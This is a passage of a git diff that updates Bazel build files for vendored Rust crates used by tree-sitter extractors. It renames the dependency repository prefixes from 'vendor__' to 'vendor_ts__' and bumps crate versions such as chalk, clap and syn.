"@vendor_ts__serde_json-1.0.139//:serde_json", + "@vendor_ts__thiserror-1.0.69//:thiserror", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cc-1.2.7.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cc-1.2.7.bazel index 650c2f35f4db..56be5f5153be 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cc-1.2.7.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.cc-1.2.7.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "1.2.7", deps = [ - "@vendor__shlex-1.3.0//:shlex", + "@vendor_ts__shlex-1.3.0//:shlex", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-derive-0.98.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-derive-0.99.0.bazel similarity index 94% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-derive-0.98.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-derive-0.99.0.bazel index 3c918d1dc988..bb2cfb0ca84c 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-derive-0.98.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-derive-0.99.0.bazel @@ -79,11 +79,11 @@ rust_proc_macro( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.98.0", + version = "0.99.0", deps = [ - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", - "@vendor__synstructure-0.13.1//:synstructure", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", + "@vendor_ts__synstructure-0.13.1//:synstructure", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-ir-0.98.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-ir-0.99.0.bazel similarity index 96% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-ir-0.98.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-ir-0.99.0.bazel index 2bdd3b3a0353..45829e9abfe2 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-ir-0.98.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-ir-0.99.0.bazel @@ -31,7 +31,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2018", proc_macro_deps = [ - "@vendor__chalk-derive-0.98.0//:chalk_derive", + "@vendor_ts__chalk-derive-0.99.0//:chalk_derive", ], rustc_flags = [ "--cap-lints=allow", @@ -82,8 +82,8 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.98.0", + version = "0.99.0", deps = [ - "@vendor__bitflags-2.7.0//:bitflags", + "@vendor_ts__bitflags-2.8.0//:bitflags", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-recursive-0.98.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-recursive-0.99.0.bazel similarity index 92% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-recursive-0.98.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-recursive-0.99.0.bazel index eecbab031314..e15beb719fb1 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-recursive-0.98.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-recursive-0.99.0.bazel @@ -31,7 +31,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2018", proc_macro_deps = [ - "@vendor__chalk-derive-0.98.0//:chalk_derive", + "@vendor_ts__chalk-derive-0.99.0//:chalk_derive", ], rustc_flags = [ "--cap-lints=allow", @@ -82,11 +82,11 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.98.0", + version = "0.99.0", deps = [ - "@vendor__chalk-ir-0.98.0//:chalk_ir", - "@vendor__chalk-solve-0.98.0//:chalk_solve", - "@vendor__rustc-hash-1.1.0//:rustc_hash", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__chalk-ir-0.99.0//:chalk_ir", + "@vendor_ts__chalk-solve-0.99.0//:chalk_solve", + "@vendor_ts__rustc-hash-1.1.0//:rustc_hash", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-solve-0.98.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-solve-0.99.0.bazel similarity index 89% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-solve-0.98.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-solve-0.99.0.bazel index bca1e7971ed9..f12dc8d4f113 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-solve-0.98.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chalk-solve-0.99.0.bazel @@ -31,7 +31,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2018", proc_macro_deps = [ - "@vendor__chalk-derive-0.98.0//:chalk_derive", + "@vendor_ts__chalk-derive-0.99.0//:chalk_derive", ], rustc_flags = [ "--cap-lints=allow", @@ -82,14 +82,14 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "0.98.0", + version = "0.99.0", deps = [ - "@vendor__chalk-ir-0.98.0//:chalk_ir", - "@vendor__ena-0.14.3//:ena", - "@vendor__indexmap-2.7.0//:indexmap", - "@vendor__itertools-0.12.1//:itertools", - "@vendor__petgraph-0.6.5//:petgraph", - "@vendor__rustc-hash-1.1.0//:rustc_hash", - "@vendor__tracing-0.1.41//:tracing", + "@vendor_ts__chalk-ir-0.99.0//:chalk_ir", + "@vendor_ts__ena-0.14.3//:ena", + "@vendor_ts__indexmap-2.7.0//:indexmap", + "@vendor_ts__itertools-0.12.1//:itertools", + "@vendor_ts__petgraph-0.6.5//:petgraph", + "@vendor_ts__rustc-hash-1.1.0//:rustc_hash", + "@vendor_ts__tracing-0.1.41//:tracing", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chrono-0.4.39.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chrono-0.4.39.bazel index 24d353c1eb9b..0f8702ab3f05 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chrono-0.4.39.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.chrono-0.4.39.bazel @@ -97,97 +97,97 @@ rust_library( }), version = "0.4.39", deps = [ - "@vendor__num-traits-0.2.19//:num_traits", - "@vendor__serde-1.0.217//:serde", + "@vendor_ts__num-traits-0.2.19//:num_traits", + "@vendor_ts__serde-1.0.218//:serde", ] + select({ "@rules_rust//rust/platform:aarch64-apple-darwin": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-apple-darwin + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-apple-darwin ], "@rules_rust//rust/platform:aarch64-apple-ios": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-apple-ios + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-apple-ios ], "@rules_rust//rust/platform:aarch64-apple-ios-sim": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-apple-ios-sim + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-apple-ios-sim ], "@rules_rust//rust/platform:aarch64-linux-android": [ - "@vendor__android-tzdata-0.1.1//:android_tzdata", # aarch64-linux-android - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-linux-android + "@vendor_ts__android-tzdata-0.1.1//:android_tzdata", # aarch64-linux-android + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-linux-android ], "@rules_rust//rust/platform:aarch64-pc-windows-msvc": [ - "@vendor__windows-targets-0.52.6//:windows_targets", # aarch64-pc-windows-msvc + "@vendor_ts__windows-targets-0.52.6//:windows_targets", # aarch64-pc-windows-msvc ], "@rules_rust//rust/platform:aarch64-unknown-fuchsia": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-unknown-fuchsia + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-unknown-fuchsia ], "@rules_rust//rust/platform:aarch64-unknown-linux-gnu": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-unknown-linux-gnu + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-unknown-linux-gnu ], "@rules_rust//rust/platform:aarch64-unknown-nixos-gnu": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-unknown-linux-gnu, aarch64-unknown-nixos-gnu + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-unknown-linux-gnu, aarch64-unknown-nixos-gnu ], "@rules_rust//rust/platform:aarch64-unknown-nto-qnx710": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-unknown-nto-qnx710 + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # aarch64-unknown-nto-qnx710 ], "@rules_rust//rust/platform:arm-unknown-linux-gnueabi": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # arm-unknown-linux-gnueabi + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # arm-unknown-linux-gnueabi ], "@rules_rust//rust/platform:armv7-linux-androideabi": [ - "@vendor__android-tzdata-0.1.1//:android_tzdata", # armv7-linux-androideabi - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # armv7-linux-androideabi + "@vendor_ts__android-tzdata-0.1.1//:android_tzdata", # armv7-linux-androideabi + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # armv7-linux-androideabi ], "@rules_rust//rust/platform:armv7-unknown-linux-gnueabi": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # armv7-unknown-linux-gnueabi + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # armv7-unknown-linux-gnueabi ], "@rules_rust//rust/platform:i686-apple-darwin": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # i686-apple-darwin + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # i686-apple-darwin ], "@rules_rust//rust/platform:i686-linux-android": [ - "@vendor__android-tzdata-0.1.1//:android_tzdata", # i686-linux-android - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # i686-linux-android + "@vendor_ts__android-tzdata-0.1.1//:android_tzdata", # i686-linux-android + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # i686-linux-android ], "@rules_rust//rust/platform:i686-pc-windows-msvc": [ - "@vendor__windows-targets-0.52.6//:windows_targets", # i686-pc-windows-msvc + "@vendor_ts__windows-targets-0.52.6//:windows_targets", # i686-pc-windows-msvc ], "@rules_rust//rust/platform:i686-unknown-freebsd": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # i686-unknown-freebsd + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # i686-unknown-freebsd ], "@rules_rust//rust/platform:i686-unknown-linux-gnu": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # i686-unknown-linux-gnu + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # i686-unknown-linux-gnu ], "@rules_rust//rust/platform:powerpc-unknown-linux-gnu": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # powerpc-unknown-linux-gnu + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # powerpc-unknown-linux-gnu ], "@rules_rust//rust/platform:s390x-unknown-linux-gnu": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # s390x-unknown-linux-gnu + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # s390x-unknown-linux-gnu ], "@rules_rust//rust/platform:wasm32-unknown-unknown": [ - "@vendor__js-sys-0.3.76//:js_sys", # wasm32-unknown-unknown - "@vendor__wasm-bindgen-0.2.99//:wasm_bindgen", # wasm32-unknown-unknown + "@vendor_ts__js-sys-0.3.76//:js_sys", # wasm32-unknown-unknown + "@vendor_ts__wasm-bindgen-0.2.99//:wasm_bindgen", # wasm32-unknown-unknown ], "@rules_rust//rust/platform:x86_64-apple-darwin": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-apple-darwin + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-apple-darwin ], "@rules_rust//rust/platform:x86_64-apple-ios": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-apple-ios + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-apple-ios ], "@rules_rust//rust/platform:x86_64-linux-android": [ - "@vendor__android-tzdata-0.1.1//:android_tzdata", # x86_64-linux-android - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-linux-android + "@vendor_ts__android-tzdata-0.1.1//:android_tzdata", # x86_64-linux-android + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-linux-android ], "@rules_rust//rust/platform:x86_64-pc-windows-msvc": [ - "@vendor__windows-targets-0.52.6//:windows_targets", # x86_64-pc-windows-msvc + "@vendor_ts__windows-targets-0.52.6//:windows_targets", # x86_64-pc-windows-msvc ], "@rules_rust//rust/platform:x86_64-unknown-freebsd": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-unknown-freebsd + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-unknown-freebsd ], "@rules_rust//rust/platform:x86_64-unknown-fuchsia": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-unknown-fuchsia + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-unknown-fuchsia ], "@rules_rust//rust/platform:x86_64-unknown-linux-gnu": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-unknown-linux-gnu + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-unknown-linux-gnu ], "@rules_rust//rust/platform:x86_64-unknown-nixos-gnu": [ - "@vendor__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-unknown-linux-gnu, x86_64-unknown-nixos-gnu + "@vendor_ts__iana-time-zone-0.1.61//:iana_time_zone", # x86_64-unknown-linux-gnu, x86_64-unknown-nixos-gnu ], "//conditions:default": [], }), diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap-4.5.26.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap-4.5.31.bazel similarity index 96% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap-4.5.26.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap-4.5.31.bazel index b0fc737a3a18..704def0d16af 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap-4.5.26.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap-4.5.31.bazel @@ -41,7 +41,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__clap_derive-4.5.24//:clap_derive", + "@vendor_ts__clap_derive-4.5.28//:clap_derive", ], rustc_flags = [ "--cap-lints=allow", @@ -92,8 +92,8 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "4.5.26", + version = "4.5.31", deps = [ - "@vendor__clap_builder-4.5.26//:clap_builder", + "@vendor_ts__clap_builder-4.5.31//:clap_builder", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_builder-4.5.26.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_builder-4.5.31.bazel similarity index 94% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_builder-4.5.26.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_builder-4.5.31.bazel index 1cb3a18cd0c1..a65b405d44c7 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_builder-4.5.26.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_builder-4.5.31.bazel @@ -87,11 +87,11 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "4.5.26", + version = "4.5.31", deps = [ - "@vendor__anstream-0.6.18//:anstream", - "@vendor__anstyle-1.0.10//:anstyle", - "@vendor__clap_lex-0.7.4//:clap_lex", - "@vendor__strsim-0.11.1//:strsim", + "@vendor_ts__anstream-0.6.18//:anstream", + "@vendor_ts__anstyle-1.0.10//:anstyle", + "@vendor_ts__clap_lex-0.7.4//:clap_lex", + "@vendor_ts__strsim-0.11.1//:strsim", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_derive-4.5.24.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_derive-4.5.28.bazel similarity index 94% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_derive-4.5.24.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_derive-4.5.28.bazel index fdf5dc04a455..1e6c70d11eed 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_derive-4.5.24.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.clap_derive-4.5.28.bazel @@ -82,11 +82,11 @@ rust_proc_macro( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "4.5.24", + version = "4.5.28", deps = [ - "@vendor__heck-0.5.0//:heck", - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__heck-0.5.0//:heck", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crc32fast-1.4.2.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crc32fast-1.4.2.bazel index 9c41e7925d47..1bc709e0ab7b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crc32fast-1.4.2.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crc32fast-1.4.2.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "1.4.2", deps = [ - "@vendor__cfg-if-1.0.0//:cfg_if", + "@vendor_ts__cfg-if-1.0.0//:cfg_if", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-channel-0.5.14.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-channel-0.5.14.bazel index e2b441186d1e..716f7732fc48 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-channel-0.5.14.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-channel-0.5.14.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "0.5.14", deps = [ - "@vendor__crossbeam-utils-0.8.21//:crossbeam_utils", + "@vendor_ts__crossbeam-utils-0.8.21//:crossbeam_utils", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-deque-0.8.6.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-deque-0.8.6.bazel index f0201da11a69..3bb0e6f18ea2 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-deque-0.8.6.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-deque-0.8.6.bazel @@ -85,7 +85,7 @@ rust_library( }), version = "0.8.6", deps = [ - "@vendor__crossbeam-epoch-0.9.18//:crossbeam_epoch", - "@vendor__crossbeam-utils-0.8.21//:crossbeam_utils", + "@vendor_ts__crossbeam-epoch-0.9.18//:crossbeam_epoch", + "@vendor_ts__crossbeam-utils-0.8.21//:crossbeam_utils", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-epoch-0.9.18.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-epoch-0.9.18.bazel index be6f936368d2..76d404fae876 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-epoch-0.9.18.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-epoch-0.9.18.bazel @@ -85,6 +85,6 @@ rust_library( }), version = "0.9.18", deps = [ - "@vendor__crossbeam-utils-0.8.21//:crossbeam_utils", + "@vendor_ts__crossbeam-utils-0.8.21//:crossbeam_utils", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-utils-0.8.21.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-utils-0.8.21.bazel index fe420a1c2676..4c738272e68b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-utils-0.8.21.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.crossbeam-utils-0.8.21.bazel @@ -86,7 +86,7 @@ rust_library( }), version = "0.8.21", deps = [ - "@vendor__crossbeam-utils-0.8.21//:build_script_build", + "@vendor_ts__crossbeam-utils-0.8.21//:build_script_build", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling-0.20.10.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling-0.20.10.bazel index f2b095874d9c..81ba24ba9546 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling-0.20.10.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling-0.20.10.bazel @@ -35,7 +35,7 @@ rust_library( crate_root = "src/lib.rs", edition = "2021", proc_macro_deps = [ - "@vendor__darling_macro-0.20.10//:darling_macro", + "@vendor_ts__darling_macro-0.20.10//:darling_macro", ], rustc_flags = [ "--cap-lints=allow", @@ -88,6 +88,6 @@ rust_library( }), version = "0.20.10", deps = [ - "@vendor__darling_core-0.20.10//:darling_core", + "@vendor_ts__darling_core-0.20.10//:darling_core", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling_core-0.20.10.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling_core-0.20.10.bazel index de185bceab00..299241442a11 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling_core-0.20.10.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling_core-0.20.10.bazel @@ -85,11 +85,11 @@ rust_library( }), version = "0.20.10", deps = [ - "@vendor__fnv-1.0.7//:fnv", - "@vendor__ident_case-1.0.1//:ident_case", - "@vendor__proc-macro2-1.0.93//:proc_macro2", - "@vendor__quote-1.0.38//:quote", - "@vendor__strsim-0.11.1//:strsim", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__fnv-1.0.7//:fnv", + "@vendor_ts__ident_case-1.0.1//:ident_case", + "@vendor_ts__proc-macro2-1.0.93//:proc_macro2", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__strsim-0.11.1//:strsim", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling_macro-0.20.10.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling_macro-0.20.10.bazel index edd5c9242ce3..aeb122f8a02c 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling_macro-0.20.10.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.darling_macro-0.20.10.bazel @@ -81,8 +81,8 @@ rust_proc_macro( }), version = "0.20.10", deps = [ - "@vendor__darling_core-0.20.10//:darling_core", - "@vendor__quote-1.0.38//:quote", - "@vendor__syn-2.0.96//:syn", + "@vendor_ts__darling_core-0.20.10//:darling_core", + "@vendor_ts__quote-1.0.38//:quote", + "@vendor_ts__syn-2.0.98//:syn", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.dashmap-5.5.3.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.dashmap-5.5.3.bazel index 6aa63816f3a7..f761a7301a9b 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.dashmap-5.5.3.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.dashmap-5.5.3.bazel @@ -84,10 +84,10 @@ rust_library( }), version = "5.5.3", deps = [ - "@vendor__cfg-if-1.0.0//:cfg_if", - "@vendor__hashbrown-0.14.5//:hashbrown", - "@vendor__lock_api-0.4.12//:lock_api", - "@vendor__once_cell-1.20.2//:once_cell", - "@vendor__parking_lot_core-0.9.10//:parking_lot_core", + "@vendor_ts__cfg-if-1.0.0//:cfg_if", + "@vendor_ts__hashbrown-0.14.5//:hashbrown", + "@vendor_ts__lock_api-0.4.12//:lock_api", + "@vendor_ts__once_cell-1.20.3//:once_cell", + "@vendor_ts__parking_lot_core-0.9.10//:parking_lot_core", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.either-1.13.0.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.either-1.14.0.bazel similarity index 98% rename from misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.either-1.13.0.bazel rename to misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.either-1.14.0.bazel index b3a9ed19098a..7d258985cf58 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.either-1.13.0.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.either-1.14.0.bazel @@ -33,7 +33,7 @@ rust_library( "use_std", ], crate_root = "src/lib.rs", - edition = "2018", + edition = "2021", rustc_flags = [ "--cap-lints=allow", ], @@ -83,5 +83,5 @@ rust_library( "@rules_rust//rust/platform:x86_64-unknown-uefi": [], "//conditions:default": ["@platforms//:incompatible"], }), - version = "1.13.0", + version = "1.14.0", ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ena-0.14.3.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ena-0.14.3.bazel index b1f8132eef70..0675dd061161 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ena-0.14.3.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.ena-0.14.3.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "0.14.3", deps = [ - "@vendor__log-0.4.22//:log", + "@vendor_ts__log-0.4.25//:log", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-0.2.33.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-0.2.33.bazel index e87060e4b44c..625e2e262168 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-0.2.33.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-0.2.33.bazel @@ -81,10 +81,10 @@ rust_library( }), version = "0.2.33", deps = [ - "@vendor__encoding-index-japanese-1.20141219.5//:encoding_index_japanese", - "@vendor__encoding-index-korean-1.20141219.5//:encoding_index_korean", - "@vendor__encoding-index-simpchinese-1.20141219.5//:encoding_index_simpchinese", - "@vendor__encoding-index-singlebyte-1.20141219.5//:encoding_index_singlebyte", - "@vendor__encoding-index-tradchinese-1.20141219.5//:encoding_index_tradchinese", + "@vendor_ts__encoding-index-japanese-1.20141219.5//:encoding_index_japanese", + "@vendor_ts__encoding-index-korean-1.20141219.5//:encoding_index_korean", + "@vendor_ts__encoding-index-simpchinese-1.20141219.5//:encoding_index_simpchinese", + "@vendor_ts__encoding-index-singlebyte-1.20141219.5//:encoding_index_singlebyte", + "@vendor_ts__encoding-index-tradchinese-1.20141219.5//:encoding_index_tradchinese", ], ) diff --git a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-japanese-1.20141219.5.bazel b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-japanese-1.20141219.5.bazel index 880bee66622e..13d487c632d0 100644 --- a/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-japanese-1.20141219.5.bazel +++ b/misc/bazel/3rdparty/tree_sitter_extractors_deps/BUILD.encoding-index-japanese-1.20141219.5.bazel @@ -81,6 +81,6 @@ rust_library( }), version = "1.20141219.5", deps = [ - "@vendor__encoding_index_tests-0.1.4//:encoding_index_tests", + "@vendor_ts__encoding_index_tests-0.1.4//:encoding_index_tests", ], ) diff --git 